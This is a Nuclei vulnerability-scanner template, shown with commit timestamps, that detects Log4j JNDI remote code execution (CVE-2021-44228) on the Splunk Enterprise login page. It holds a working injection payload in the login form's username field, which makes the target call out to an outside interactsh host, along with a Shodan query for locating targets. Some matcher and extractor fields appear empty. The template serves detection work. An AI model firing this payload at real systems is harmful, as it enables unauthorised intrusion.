nuclei-templates/http/vulnerabilities/other/splunk-enterprise-log4j-rce...

64 lines
2.0 KiB
YAML
Raw Normal View History

2023-10-18 20:00:15 +00:00
id: splunk-enterprise-log4j-rce
info:
name: Splunk Enterprise - Remote Code Execution (Apache Log4j)
2023-10-19 07:28:29 +00:00
author: shaikhyaser
2023-10-18 20:00:15 +00:00
severity: critical
description: |
Splunk Enterprise is susceptible to Log4j JNDI remote code execution. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape.
reference:
- https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
max-request: 1
shodan-query: http.title:"Login - Splunk"
2023-10-18 20:00:15 +00:00
tags: cve,cve2021,rce,jndi,log4j,splunk,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
2023-10-19 07:28:29 +00:00
str: "{{rand_base(5)}}"
2023-10-18 20:00:15 +00:00
http:
- raw:
- |
POST /en-US/account/login HTTP/1.1
Host: {{Hostname}}
Accept: text/javascript, text/html, application/xml, text/xml, /
X-Requested-With: XMLHttpRequest
Origin: {{RootURL}}
2023-10-19 07:28:29 +00:00
Referer: {{RootURL}}
2023-10-18 20:00:15 +00:00
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2023-10-19 07:28:29 +00:00
cval={{unix_time()}}&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}&return_to=%2Fen-US%2F
2023-10-18 20:00:15 +00:00
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
2023-10-18 20:00:15 +00:00
extractors:
- type: kval
kval:
2023-10-18 20:00:15 +00:00
- type: regex
group: 2
regex:
part: interactsh_request
- type: regex
group: 1
regex:
part: interactsh_request
# digest: 4a0a00473045022100d5db89b935a8fafc3db2fc56c38abf53d78f9c578e65ade1c9674979eef53a6d02201deb8a759efbe552d5bbc5b003084a79e3bc16d6fe0e516a5f34c5dce433d420:922c64590222798bb761d5b6d8e72950